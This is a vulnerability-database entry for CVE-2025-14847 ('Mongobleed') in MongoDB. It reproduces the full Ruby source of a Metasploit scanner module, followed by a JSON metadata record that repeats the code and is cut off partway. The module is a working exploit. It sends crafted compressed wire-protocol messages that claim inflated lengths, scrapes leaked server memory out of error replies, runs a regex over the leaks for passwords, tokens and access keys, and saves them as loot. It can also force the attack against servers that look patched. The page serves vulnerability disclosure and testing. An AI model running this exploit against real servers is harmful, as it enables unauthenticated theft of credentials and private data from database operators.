MongoDB Memory Disclosure (CVE-2025-14847) – Mongobleed_MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED-

8.7 / 10

HIGH

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N

Description

This module exploits a memory disclosure vulnerability in MongoDB's zlib decompression handling CVE-2025-14847. By sending crafted OPCOMPRESSED messages with inflated BSON document lengths, the server reads beyond the decompressed buffer and returns...

Visit Original Source

Basic Information

ID MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED-

Published Dec 30, 2025 at 18:58

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed',
'Description' => %q{
This module exploits a memory disclosure vulnerability in MongoDB's zlib
decompression handling (CVE-2025-14847). By sending crafted OP_COMPRESSED
messages with inflated BSON document lengths, the server reads beyond the
decompressed buffer and returns leaked memory contents in error messages.

The vulnerability allows unauthenticated remote attackers to leak server
memory which may contain sensitive information such as credentials, session
tokens, encryption keys, or other application data.
},
'Author' => [
'Alexander Hagenah', # Metasploit module (x.com/xaitax)
'Diego Ledda', # Co-author & review (x.com/jbx81)
'Joe Desimone' # Original discovery and PoC (x.com/dez_)
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-14847'],
['URL', 'https://www.wiz.io/blog/mongobleed-cve-2025-14847-exploited-in-the-wild-mongodb'],
['URL', 'https://jira.mongodb.org/browse/SERVER-115508'],
['URL', 'https://x.com/dez_']
],
'DisclosureDate' => '2025-12-19',
'DefaultOptions' => {
'RPORT' => 27017
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
}
)
)

register_options(
[
Opt::RPORT(27017),
OptInt.new('MIN_OFFSET', [true, 'Minimum BSON document length offset', 20]),
OptInt.new('MAX_OFFSET', [true, 'Maximum BSON document length offset', 8192]),
OptInt.new('STEP_SIZE', [true, 'Offset increment (higher = faster, less thorough)', 1]),
OptInt.new('BUFFER_PADDING', [true, 'Padding added to buffer size claim', 500]),
OptInt.new('LEAK_THRESHOLD', [true, 'Minimum bytes to report as interesting leak', 10]),
OptBool.new('QUICK_SCAN', [true, 'Quick scan mode - sample key offsets only', false]),
OptInt.new('REPEAT', [true, 'Number of scan passes (more passes = more data)', 1])
]
)

register_advanced_options(
[
OptBool.new('SHOW_ALL_LEAKS', [true, 'Show all leaked fragments, not just large ones', false]),
OptBool.new('SHOW_HEX', [true, 'Show hexdump of leaked data', false]),
OptString.new('SECRETS_PATTERN', [true, 'Regex pattern to detect sensitive data', 'password|secret|key|token|admin|AKIA|Bearer|mongodb://|mongo:|conn|auth']),
OptBool.new('FORCE_EXPLOIT', [true, 'Attempt exploitation even if version check indicates not vulnerable', false]),
OptInt.new('PROGRESS_INTERVAL', [true, 'Show progress every N offsets (0 to disable)', 500])
]
)
end

# MongoDB Wire Protocol constants
OP_QUERY = 2004 # Legacy query opcode
OP_REPLY = 1 # Legacy reply opcode
OP_COMPRESSED = 2012
OP_MSG = 2013
COMPRESSOR_ZLIB = 2

def check_vulnerable_version(version_str)
# Parse version for comparison
version_match = version_str.match(/^(\d+\.\d+\.\d+)/)
return :unknown unless version_match

mongodb_version = Rex::Version.new(version_match[1])

# Check against vulnerable version ranges per MongoDB JIRA SERVER-115508
if mongodb_version.between?(Rex::Version.new('3.6.0'), Rex::Version.new('3.6.99')) ||
mongodb_version.between?(Rex::Version.new('4.0.0'), Rex::Version.new('4.0.99')) ||
mongodb_version.between?(Rex::Version.new('4.2.0'), Rex::Version.new('4.2.99'))
return :vulnerable_eol
elsif mongodb_version.between?(Rex::Version.new('4.4.0'), Rex::Version.new('4.4.29')) ||
mongodb_version.between?(Rex::Version.new('5.0.0'), Rex::Version.new('5.0.31')) ||
mongodb_version.between?(Rex::Version.new('6.0.0'), Rex::Version.new('6.0.26')) ||
mongodb_version.between?(Rex::Version.new('7.0.0'), Rex::Version.new('7.0.27')) ||
mongodb_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.16')) ||
mongodb_version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.2'))
return :vulnerable
elsif (mongodb_version >= Rex::Version.new('4.4.30') && mongodb_version < Rex::Version.new('5.0.0')) ||
(mongodb_version >= Rex::Version.new('5.0.32') && mongodb_version < Rex::Version.new('6.0.0')) ||
(mongodb_version >= Rex::Version.new('6.0.27') && mongodb_version < Rex::Version.new('7.0.0')) ||
(mongodb_version >= Rex::Version.new('7.0.28') && mongodb_version < Rex::Version.new('8.0.0')) ||
(mongodb_version >= Rex::Version.new('8.0.17') && mongodb_version < Rex::Version.new('8.2.0')) ||
(mongodb_version >= Rex::Version.new('8.2.3'))
return :patched
end

:unknown
end

def run_host(ip)
# Version detection and vulnerability check
version_info = get_mongodb_version

if version_info
version_str = version_info[:version]
print_status("MongoDB version: #{version_str}")

vuln_status = check_vulnerable_version(version_str)
case vuln_status
when :vulnerable_eol
print_good("Version #{version_str} is VULNERABLE (EOL, no fix available)")
when :vulnerable
print_good("Version #{version_str} is VULNERABLE to CVE-2025-14847")
when :patched
print_warning("Version #{version_str} appears to be PATCHED")
unless datastore['FORCE_EXPLOIT']
print_status('Set FORCE_EXPLOIT=true to attempt exploitation anyway')
return
end
print_status('FORCE_EXPLOIT enabled, continuing...')
when :unknown
print_warning("Version #{version_str} - vulnerability status unknown")
print_status('Proceeding with exploitation attempt...')
end
else
print_warning('Could not determine MongoDB version')
print_status('Proceeding with exploitation attempt...')
end

# Perform the memory leak exploitation
exploit_memory_leak(ip, version_info)
end

def get_mongodb_version
connect

# Build buildInfo command using legacy OP_QUERY
# This works without authentication on most MongoDB configurations
response = send_command('admin', { 'buildInfo' => 1 })
disconnect

return nil if response.nil?

# Parse BSON response to extract version
parse_build_info(response)
rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
vprint_error("Connection error during version check: #{e.message}")
nil
rescue StandardError => e
vprint_error("Error getting MongoDB version: #{e.message}")
nil
ensure
begin
disconnect
rescue StandardError
nil
end
end

def send_command(database, command)
# Build BSON document for command
bson_doc = build_bson_document(command)

# Build OP_QUERY packet
# flags (4 bytes) + fullCollectionName + numberToSkip (4) + numberToReturn (4) + query
collection_name = "#{database}.$cmd\x00"

query_body = [0].pack('V') # flags
query_body << collection_name # fullCollectionName (null-terminated)
query_body << [0].pack('V') # numberToSkip
query_body << [1].pack('V') # numberToReturn
query_body << bson_doc # query document

# Build header
request_id = rand(0xFFFFFFFF)
message_length = 16 + query_body.length
header = [message_length, request_id, 0, OP_QUERY].pack('VVVV')

# Send and receive
sock.put(header + query_body)

# Read response
response_header = sock.get_once(16, 5)
return nil if response_header.nil? || response_header.length < 16

msg_len, _req_id, _resp_to, opcode = response_header.unpack('VVVV')
return nil unless opcode == OP_REPLY

# Read rest of response
remaining = msg_len - 16
return nil if remaining <= 0

response_body = sock.get_once(remaining, 5)
return nil if response_body.nil?

# OP_REPLY structure:
# responseFlags (4) + cursorID (8) + startingFrom (4) + numberReturned (4) + documents
return nil if response_body.length < 20

response_body[20..] # Return documents portion
end

def build_bson_document(hash)
doc = ''.b

hash.each do |key, value|
case value
when Integer
if value.between?(-2_147_483_648, 2_147_483_647)
doc << "\x10" # int32 type
doc << "#{key}\x00" # key (cstring)
doc << [value].pack('V') # value
else
doc << "\x12" # int64 type
doc << "#{key}\x00"
doc << [value].pack('q<')
end
when Float
doc << "\x01" # double type
doc << "#{key}\x00"
doc << [value].pack('E')
when String
doc << "\x02" # string type
doc << "#{key}\x00"
doc << [value.length + 1].pack('V') # string length (including null)
doc << "#{value}\x00"
when TrueClass, FalseClass
doc << "\x08" # boolean type
doc << "#{key}\x00"
doc << (value ? "\x01" : "\x00")
end
end

doc << "\x00" # Document terminator
[doc.length + 4].pack('V') + doc # Prepend document length
end

def parse_build_info(bson_data)
return nil if bson_data.nil? || bson_data.length < 5

result = {}

# Parse BSON document
doc_len = bson_data[0, 4].unpack1('V')
return nil if doc_len > bson_data.length

pos = 4
while pos < doc_len - 1
type = bson_data[pos].ord
break if type == 0

pos += 1

# Read key (cstring)
key_end = bson_data.index("\x00", pos)
break if key_end.nil?

key = bson_data[pos...key_end]
pos = key_end + 1

case type
when 0x02 # String
str_len = bson_data[pos, 4].unpack1('V')
value = bson_data[pos + 4, str_len - 1]
pos += 4 + str_len

case key
when 'version'
result[:version] = value
when 'gitVersion'
result[:git_version] = value
when 'sysInfo'
result[:sys_info] = value
end
when 0x03 # Embedded document
sub_doc_len = bson_data[pos, 4].unpack1('V')
if key == 'buildEnvironment'
# Could parse this for more details
end
pos += sub_doc_len
when 0x10 # int32
pos += 4
when 0x12 # int64
pos += 8
when 0x01 # double
pos += 8
when 0x08 # boolean
pos += 1
when 0x04 # array
arr_len = bson_data[pos, 4].unpack1('V')
pos += arr_len
else
# Unknown type, try to continue
break
end
end

# Try alternate method if version not found (using hello/isMaster)
result[:version] ||= try_hello_command

result[:version] ? result : nil
end

def try_hello_command
begin
response = send_command('admin', { 'hello' => 1 })
return nil if response.nil?

# Look for version string in response
if response =~ /(\d+\.\d+\.\d+)/
return ::Regexp.last_match(1)
end
rescue StandardError
nil
end
nil
end

def exploit_memory_leak(ip, version_info)
all_leaked = ''.b
unique_leaks = Set.new
secrets_found = []

# Determine offsets to scan
offsets = generate_scan_offsets
total_offsets = offsets.size
repeat_count = datastore['REPEAT']

if repeat_count > 1
print_status("Running #{repeat_count} scan passes to maximize data collection...")
end

# Track overall progress
progress_interval = datastore['PROGRESS_INTERVAL']
Time.now

1.upto(repeat_count) do |pass|
if repeat_count > 1
print_status("=== Pass #{pass}/#{repeat_count} ===")
end

print_status("Scanning #{total_offsets} offsets (#{datastore['MIN_OFFSET']}-#{datastore['MAX_OFFSET']}, step=#{datastore['STEP_SIZE']}#{datastore['QUICK_SCAN'] ? ', quick mode' : ''})")

start_time = Time.now
scanned = 0
pass_leaks = 0

offsets.each do |doc_len|
# Progress reporting
scanned += 1
if progress_interval > 0 && (scanned % progress_interval == 0)
elapsed = Time.now - start_time
rate = scanned / elapsed
remaining = ((total_offsets - scanned) / rate).round
print_status("Progress: #{scanned}/#{total_offsets} (#{(scanned * 100.0 / total_offsets).round(1)}%) - #{unique_leaks.size} leaks found - ETA: #{remaining}s")
end

response = send_probe(doc_len, doc_len + datastore['BUFFER_PADDING'])
next if response.nil? || response.empty?

leaks = extract_leaks(response)
leaks.each do |data|
next if unique_leaks.include?(data)

unique_leaks.add(data)
all_leaked << data
pass_leaks += 1

# Check for interesting patterns
check_secrets(data, doc_len, secrets_found)

# Report large leaks or all if configured
next unless data.length > datastore['LEAK_THRESHOLD'] || datastore['SHOW_ALL_LEAKS']

preview = data.gsub(/[^[:print:]]/, '.')[0, 80]
print_good("offset=#{doc_len.to_s.ljust(4)} len=#{data.length.to_s.ljust(4)}: #{preview}")

# Show hex dump if enabled
if datastore['SHOW_HEX'] && !data.empty?
print_hexdump(data)
end
end
rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
vprint_error("Connection error at offset #{doc_len}: #{e.message}")
next
rescue ::Timeout::Error
vprint_error("Timeout at offset #{doc_len}")
next
end

# Pass summary
if repeat_count > 1
print_status("Pass #{pass} complete: #{pass_leaks} new leaks (#{unique_leaks.size} total unique)")
end
end

# Overall summary and loot storage
if !all_leaked.empty?
print_line
print_good("Total leaked: #{all_leaked.length} bytes")
print_good("Unique fragments: #{unique_leaks.size}")

# Store leaked data as loot
loot_info = 'MongoDB Memory Disclosure (CVE-2025-14847)'
loot_info += " - Version: #{version_info[:version]}" if version_info&.dig(:version)

path = store_loot(
'mongodb.memory_leak',
'application/octet-stream',
ip,
all_leaked,
'mongobleed.bin',
loot_info
)
print_good("Leaked data saved to: #{path}")

# Report found secrets
if secrets_found.any?
print_line
print_warning('Potential secrets detected:')
secrets_found.uniq.each do |secret|
print_warning(" - #{secret}")
end
end

# Report the vulnerability
vuln_info = "Leaked #{all_leaked.length} bytes of server memory"
vuln_info += " (MongoDB #{version_info[:version]})" if version_info&.dig(:version)

report_vuln(
host: ip,
port: rport,
proto: 'tcp',
name: name,
refs: references,
info: vuln_info
)
else
print_status("No data leaked from #{ip}:#{rport}")
end
end

def send_probe(doc_len, buffer_size)
# Build minimal BSON content - we lie about total length to trigger the bug
# int32 field "a" with value 1
bson_content = "\x10a\x00\x01\x00\x00\x00".b

# BSON document with inflated length (this is the key to the exploit)
bson = [doc_len].pack('V') + bson_content

# Wrap in OP_MSG structure
# flags (4 bytes) + section kind (1 byte) + BSON
op_msg = [0].pack('V') + "\x00".b + bson

# Compress the OP_MSG payload
compressed_data = Zlib::Deflate.deflate(op_msg)

# Build OP_COMPRESSED payload
# originalOpcode (4 bytes) + uncompressedSize (4 bytes) + compressorId (1 byte) + compressedData
payload = [OP_MSG].pack('V')
payload << [buffer_size].pack('V') # Claimed uncompressed size (inflated)
payload << [COMPRESSOR_ZLIB].pack('C')
payload << compressed_data

# MongoDB wire protocol header
# messageLength (4 bytes) + requestID (4 bytes) + responseTo (4 bytes) + opCode (4 bytes)
message_length = 16 + payload.length
header = [message_length, 1, 0, OP_COMPRESSED].pack('VVVV')

# Send and receive with proper cleanup
response = nil
begin
connect
sock.put(header + payload)
response = recv_mongo_response
ensure
begin
disconnect
rescue StandardError
nil
end
end

response
end

def recv_mongo_response
# Read header first (16 bytes minimum)
header = sock.get_once(16, 2)
return nil if header.nil? || header.length < 4

msg_len = header.unpack1('V')
return header if msg_len <= 16

# Read remaining data
remaining = msg_len - header.length
if remaining > 0
data = sock.get_once(remaining, 2)
return header if data.nil?

header + data
else
header
end
rescue ::Timeout::Error, ::EOFError
nil
end

def extract_leaks(response)
return [] if response.nil? || response.length < 25

leaks = []

begin
msg_len = response.unpack1('V')
return [] if msg_len > response.length

# Check if response is compressed (opcode at offset 12)
opcode = response[12, 4].unpack1('V')

if opcode == OP_COMPRESSED
# Decompress: skip header (16) + originalOpcode (4) + uncompressedSize (4) + compressorId (1) = 25 bytes
raw = Zlib::Inflate.inflate(response[25, msg_len - 25])
else
# Uncompressed OP_MSG - skip header
raw = response[16, msg_len - 16]
end

return [] if raw.nil?

# Extract field names from BSON parsing errors
# These contain memory leaked as "field names"
raw.scan(/field name '([^']*)'/) do |match|
data = match[0]
# Filter out known legitimate field names
next if data.nil? || data.empty?
next if ['?', 'a', '$db', 'ping', 'ok', 'errmsg', 'code', 'codeName'].include?(data)

leaks << data
end

# Extract type bytes from unrecognized BSON type errors
raw.scan(/(?:unrecognized|unknown|invalid)\s+(?:BSON\s+)?type[:\s]+(\d+)/i) do |match|
type_byte = match[0].to_i & 0xFF
leaks << type_byte.chr if type_byte > 0
end
rescue Zlib::Error => e
vprint_error("Decompression error: #{e.message}")
rescue StandardError => e
vprint_error("Error extracting leaks: #{e.message}")
end

leaks
end

def check_secrets(data, offset, secrets_found)
pattern = Regexp.new(datastore['SECRETS_PATTERN'], Regexp::IGNORECASE)
return unless data =~ pattern

match = ::Regexp.last_match[0]
match_pos = ::Regexp.last_match.begin(0)

# Extract context around the match (20 chars before and after)
context_start = [match_pos - 20, 0].max
context_end = [match_pos + match.length + 20, data.length].min
context = data[context_start...context_end].gsub(/[^[:print:]]/, '.')

# Highlight position in context
secret_info = "Pattern '#{match}' at offset #{offset}"
secret_info += " (pos #{match_pos}): ...#{context}..."

secrets_found << secret_info
print_warning("Secret pattern detected at offset #{offset}: '#{match}' in context: ...#{context}...")
end

def generate_scan_offsets
min_off = datastore['MIN_OFFSET']
max_off = datastore['MAX_OFFSET']
step = datastore['STEP_SIZE']

if datastore['QUICK_SCAN']
# Quick scan mode: sample key offsets that typically yield results
# Based on common BSON document sizes and memory alignment
quick_offsets = []

# Small offsets (header area)
quick_offsets += (20..100).step(5).to_a

# Power of 2 boundaries (common allocation sizes)
[128, 256, 512, 1024, 2048, 4096, 8192].each do |boundary|
next if boundary < min_off || boundary > max_off

# Sample around boundaries
(-10..10).step(2).each do |delta|
off = boundary + delta
quick_offsets << off if off >= min_off && off <= max_off
end
end

# Sample every 128 bytes for broader coverage
quick_offsets += (min_off..max_off).step(128).to_a

quick_offsets.uniq.sort.select { |o| o >= min_off && o <= max_off }
else
# Normal scan with step size
(min_off..max_off).step(step).to_a
end
end

def print_hexdump(data)
return if data.nil? || data.empty?

# Print hexdump in classic format (16 bytes per line)
offset = 0
data.bytes.each_slice(16) do |chunk|
hex_part = chunk.map { |b| '%02x' % b }.join(' ')
ascii_part = chunk.map { |b| (b >= 32 && b < 127) ? b.chr : '.' }.join

# Pad hex part if less than 16 bytes
hex_part = hex_part.ljust(47)

print_line(" #{('%04x' % offset)} #{hex_part} |#{ascii_part}|")
offset += 16

# Limit output to avoid flooding console
break if offset >= 256
end
print_line(' ...') if data.length > 256
end
end

{
    "lastseen": "2025-12-30T19:04:46",
    "description": "This module exploits a memory disclosure vulnerability in MongoDB's zlib decompression handling CVE-2025-14847. By sending crafted OPCOMPRESSED messages with inflated BSON document lengths, the server reads beyond the decompressed buffer and returns...",
    "published": "2025-12-30T18:58:44",
    "modified": "2025-12-30T18:58:44",
    "type": "metasploit",
    "title": "MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-SCANNER-MONGODB-CVE_2025_14847_MONGOBLEED-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-14847"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n  include Msf::Exploit::Remote::Tcp\n  include Msf::Auxiliary::Scanner\n  include Msf::Auxiliary::Report\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed',\n        'Description' => %q{\n          This module exploits a memory disclosure vulnerability in MongoDB's zlib\n          decompression handling (CVE-2025-14847). By sending crafted OP_COMPRESSED\n          messages with inflated BSON document lengths, the server reads beyond the\n          decompressed buffer and returns leaked memory contents in error messages.\n\n          The vulnerability allows unauthenticated remote attackers to leak server\n          memory which may contain sensitive information such as credentials, session\n          tokens, encryption keys, or other application data.\n        },\n        'Author' => [\n          'Alexander Hagenah', # Metasploit module (x.com/xaitax)\n          'Diego Ledda', # Co-author & review (x.com/jbx81)\n          'Joe Desimone' # Original discovery and PoC (x.com/dez_)\n        ],\n        'License' => MSF_LICENSE,\n        'References' => [\n          ['CVE', '2025-14847'],\n          ['URL', 'https://www.wiz.io/blog/mongobleed-cve-2025-14847-exploited-in-the-wild-mongodb'],\n          ['URL', 'https://jira.mongodb.org/browse/SERVER-115508'],\n          ['URL', 'https://x.com/dez_']\n        ],\n        'DisclosureDate' => '2025-12-19',\n        'DefaultOptions' => {\n          'RPORT' => 27017\n        },\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'SideEffects' => [IOC_IN_LOGS],\n          'Reliability' => [REPEATABLE_SESSION]\n        }\n      )\n    )\n\n    register_options(\n      [\n        Opt::RPORT(27017),\n        OptInt.new('MIN_OFFSET', [true, 'Minimum BSON document length offset', 20]),\n        OptInt.new('MAX_OFFSET', [true, 'Maximum BSON document length offset', 8192]),\n        OptInt.new('STEP_SIZE', [true, 'Offset increment (higher = faster, less thorough)', 1]),\n        OptInt.new('BUFFER_PADDING', [true, 'Padding added to buffer size claim', 500]),\n        OptInt.new('LEAK_THRESHOLD', [true, 'Minimum bytes to report as interesting leak', 10]),\n        OptBool.new('QUICK_SCAN', [true, 'Quick scan mode - sample key offsets only', false]),\n        OptInt.new('REPEAT', [true, 'Number of scan passes (more passes = more data)', 1])\n      ]\n    )\n\n    register_advanced_options(\n      [\n        OptBool.new('SHOW_ALL_LEAKS', [true, 'Show all leaked fragments, not just large ones', false]),\n        OptBool.new('SHOW_HEX', [true, 'Show hexdump of leaked data', false]),\n        OptString.new('SECRETS_PATTERN', [true, 'Regex pattern to detect sensitive data', 'password|secret|key|token|admin|AKIA|Bearer|mongodb://|mongo:|conn|auth']),\n        OptBool.new('FORCE_EXPLOIT', [true, 'Attempt exploitation even if version check indicates not vulnerable', false]),\n        OptInt.new('PROGRESS_INTERVAL', [true, 'Show progress every N offsets (0 to disable)', 500])\n      ]\n    )\n  end\n\n  # MongoDB Wire Protocol constants\n  OP_QUERY = 2004       # Legacy query opcode\n  OP_REPLY = 1          # Legacy reply opcode\n  OP_COMPRESSED = 2012\n  OP_MSG = 2013\n  COMPRESSOR_ZLIB = 2\n\n  def check_vulnerable_version(version_str)\n    # Parse version for comparison\n    version_match = version_str.match(/^(\\d+\\.\\d+\\.\\d+)/)\n    return :unknown unless version_match\n\n    mongodb_version = Rex::Version.new(version_match[1])\n\n    # Check against vulnerable version ranges per MongoDB JIRA SERVER-115508\n    if mongodb_version.between?(Rex::Version.new('3.6.0'), Rex::Version.new('3.6.99')) ||\n       mongodb_version.between?(Rex::Version.new('4.0.0'), Rex::Version.new('4.0.99')) ||\n       mongodb_version.between?(Rex::Version.new('4.2.0'), Rex::Version.new('4.2.99'))\n      return :vulnerable_eol\n    elsif mongodb_version.between?(Rex::Version.new('4.4.0'), Rex::Version.new('4.4.29')) ||\n          mongodb_version.between?(Rex::Version.new('5.0.0'), Rex::Version.new('5.0.31')) ||\n          mongodb_version.between?(Rex::Version.new('6.0.0'), Rex::Version.new('6.0.26')) ||\n          mongodb_version.between?(Rex::Version.new('7.0.0'), Rex::Version.new('7.0.27')) ||\n          mongodb_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.16')) ||\n          mongodb_version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.2'))\n      return :vulnerable\n    elsif (mongodb_version >= Rex::Version.new('4.4.30') && mongodb_version < Rex::Version.new('5.0.0')) ||\n          (mongodb_version >= Rex::Version.new('5.0.32') && mongodb_version < Rex::Version.new('6.0.0')) ||\n          (mongodb_version >= Rex::Version.new('6.0.27') && mongodb_version < Rex::Version.new('7.0.0')) ||\n          (mongodb_version >= Rex::Version.new('7.0.28') && mongodb_version < Rex::Version.new('8.0.0')) ||\n          (mongodb_version >= Rex::Version.new('8.0.17') && mongodb_version < Rex::Version.new('8.2.0')) ||\n          (mongodb_version >= Rex::Version.new('8.2.3'))\n      return :patched\n    end\n\n    :unknown\n  end\n\n  def run_host(ip)\n    # Version detection and vulnerability check\n    version_info = get_mongodb_version\n\n    if version_info\n      version_str = version_info[:version]\n      print_status(\"MongoDB version: #{version_str}\")\n\n      vuln_status = check_vulnerable_version(version_str)\n      case vuln_status\n      when :vulnerable_eol\n        print_good(\"Version #{version_str} is VULNERABLE (EOL, no fix available)\")\n      when :vulnerable\n        print_good(\"Version #{version_str} is VULNERABLE to CVE-2025-14847\")\n      when :patched\n        print_warning(\"Version #{version_str} appears to be PATCHED\")\n        unless datastore['FORCE_EXPLOIT']\n          print_status('Set FORCE_EXPLOIT=true to attempt exploitation anyway')\n          return\n        end\n        print_status('FORCE_EXPLOIT enabled, continuing...')\n      when :unknown\n        print_warning(\"Version #{version_str} - vulnerability status unknown\")\n        print_status('Proceeding with exploitation attempt...')\n      end\n    else\n      print_warning('Could not determine MongoDB version')\n      print_status('Proceeding with exploitation attempt...')\n    end\n\n    # Perform the memory leak exploitation\n    exploit_memory_leak(ip, version_info)\n  end\n\n  def get_mongodb_version\n    connect\n\n    # Build buildInfo command using legacy OP_QUERY\n    # This works without authentication on most MongoDB configurations\n    response = send_command('admin', { 'buildInfo' => 1 })\n    disconnect\n\n    return nil if response.nil?\n\n    # Parse BSON response to extract version\n    parse_build_info(response)\n  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e\n    vprint_error(\"Connection error during version check: #{e.message}\")\n    nil\n  rescue StandardError => e\n    vprint_error(\"Error getting MongoDB version: #{e.message}\")\n    nil\n  ensure\n    begin\n      disconnect\n    rescue StandardError\n      nil\n    end\n  end\n\n  def send_command(database, command)\n    # Build BSON document for command\n    bson_doc = build_bson_document(command)\n\n    # Build OP_QUERY packet\n    # flags (4 bytes) + fullCollectionName + numberToSkip (4) + numberToReturn (4) + query\n    collection_name = \"#{database}.$cmd\\x00\"\n\n    query_body = [0].pack('V')              # flags\n    query_body << collection_name           # fullCollectionName (null-terminated)\n    query_body << [0].pack('V')             # numberToSkip\n    query_body << [1].pack('V')             # numberToReturn\n    query_body << bson_doc                  # query document\n\n    # Build header\n    request_id = rand(0xFFFFFFFF)\n    message_length = 16 + query_body.length\n    header = [message_length, request_id, 0, OP_QUERY].pack('VVVV')\n\n    # Send and receive\n    sock.put(header + query_body)\n\n    # Read response\n    response_header = sock.get_once(16, 5)\n    return nil if response_header.nil? || response_header.length < 16\n\n    msg_len, _req_id, _resp_to, opcode = response_header.unpack('VVVV')\n    return nil unless opcode == OP_REPLY\n\n    # Read rest of response\n    remaining = msg_len - 16\n    return nil if remaining <= 0\n\n    response_body = sock.get_once(remaining, 5)\n    return nil if response_body.nil?\n\n    # OP_REPLY structure:\n    # responseFlags (4) + cursorID (8) + startingFrom (4) + numberReturned (4) + documents\n    return nil if response_body.length < 20\n\n    response_body[20..] # Return documents portion\n  end\n\n  def build_bson_document(hash)\n    doc = ''.b\n\n    hash.each do |key, value|\n      case value\n      when Integer\n        if value.between?(-2_147_483_648, 2_147_483_647)\n          doc << \"\\x10\"                      # int32 type\n          doc << \"#{key}\\x00\"                # key (cstring)\n          doc << [value].pack('V')           # value\n        else\n          doc << \"\\x12\"                      # int64 type\n          doc << \"#{key}\\x00\"\n          doc << [value].pack('q<')\n        end\n      when Float\n        doc << \"\\x01\"                        # double type\n        doc << \"#{key}\\x00\"\n        doc << [value].pack('E')\n      when String\n        doc << \"\\x02\"                        # string type\n        doc << \"#{key}\\x00\"\n        doc << [value.length + 1].pack('V')  # string length (including null)\n        doc << \"#{value}\\x00\"\n      when TrueClass, FalseClass\n        doc << \"\\x08\"                        # boolean type\n        doc << \"#{key}\\x00\"\n        doc << (value ? \"\\x01\" : \"\\x00\")\n      end\n    end\n\n    doc << \"\\x00\" # Document terminator\n    [doc.length + 4].pack('V') + doc # Prepend document length\n  end\n\n  def parse_build_info(bson_data)\n    return nil if bson_data.nil? || bson_data.length < 5\n\n    result = {}\n\n    # Parse BSON document\n    doc_len = bson_data[0, 4].unpack1('V')\n    return nil if doc_len > bson_data.length\n\n    pos = 4\n    while pos < doc_len - 1\n      type = bson_data[pos].ord\n      break if type == 0\n\n      pos += 1\n\n      # Read key (cstring)\n      key_end = bson_data.index(\"\\x00\", pos)\n      break if key_end.nil?\n\n      key = bson_data[pos...key_end]\n      pos = key_end + 1\n\n      case type\n      when 0x02  # String\n        str_len = bson_data[pos, 4].unpack1('V')\n        value = bson_data[pos + 4, str_len - 1]\n        pos += 4 + str_len\n\n        case key\n        when 'version'\n          result[:version] = value\n        when 'gitVersion'\n          result[:git_version] = value\n        when 'sysInfo'\n          result[:sys_info] = value\n        end\n      when 0x03  # Embedded document\n        sub_doc_len = bson_data[pos, 4].unpack1('V')\n        if key == 'buildEnvironment'\n          # Could parse this for more details\n        end\n        pos += sub_doc_len\n      when 0x10  # int32\n        pos += 4\n      when 0x12  # int64\n        pos += 8\n      when 0x01  # double\n        pos += 8\n      when 0x08  # boolean\n        pos += 1\n      when 0x04  # array\n        arr_len = bson_data[pos, 4].unpack1('V')\n        pos += arr_len\n      else\n        # Unknown type, try to continue\n        break\n      end\n    end\n\n    # Try alternate method if version not found (using hello/isMaster)\n    result[:version] ||= try_hello_command\n\n    result[:version] ? result : nil\n  end\n\n  def try_hello_command\n    begin\n      response = send_command('admin', { 'hello' => 1 })\n      return nil if response.nil?\n\n      # Look for version string in response\n      if response =~ /(\\d+\\.\\d+\\.\\d+)/\n        return ::Regexp.last_match(1)\n      end\n    rescue StandardError\n      nil\n    end\n    nil\n  end\n\n  def exploit_memory_leak(ip, version_info)\n    all_leaked = ''.b\n    unique_leaks = Set.new\n    secrets_found = []\n\n    # Determine offsets to scan\n    offsets = generate_scan_offsets\n    total_offsets = offsets.size\n    repeat_count = datastore['REPEAT']\n\n    if repeat_count > 1\n      print_status(\"Running #{repeat_count} scan passes to maximize data collection...\")\n    end\n\n    # Track overall progress\n    progress_interval = datastore['PROGRESS_INTERVAL']\n    Time.now\n\n    1.upto(repeat_count) do |pass|\n      if repeat_count > 1\n        print_status(\"=== Pass #{pass}/#{repeat_count} ===\")\n      end\n\n      print_status(\"Scanning #{total_offsets} offsets (#{datastore['MIN_OFFSET']}-#{datastore['MAX_OFFSET']}, step=#{datastore['STEP_SIZE']}#{datastore['QUICK_SCAN'] ? ', quick mode' : ''})\")\n\n      start_time = Time.now\n      scanned = 0\n      pass_leaks = 0\n\n      offsets.each do |doc_len|\n        # Progress reporting\n        scanned += 1\n        if progress_interval > 0 && (scanned % progress_interval == 0)\n          elapsed = Time.now - start_time\n          rate = scanned / elapsed\n          remaining = ((total_offsets - scanned) / rate).round\n          print_status(\"Progress: #{scanned}/#{total_offsets} (#{(scanned * 100.0 / total_offsets).round(1)}%) - #{unique_leaks.size} leaks found - ETA: #{remaining}s\")\n        end\n\n        response = send_probe(doc_len, doc_len + datastore['BUFFER_PADDING'])\n        next if response.nil? || response.empty?\n\n        leaks = extract_leaks(response)\n        leaks.each do |data|\n          next if unique_leaks.include?(data)\n\n          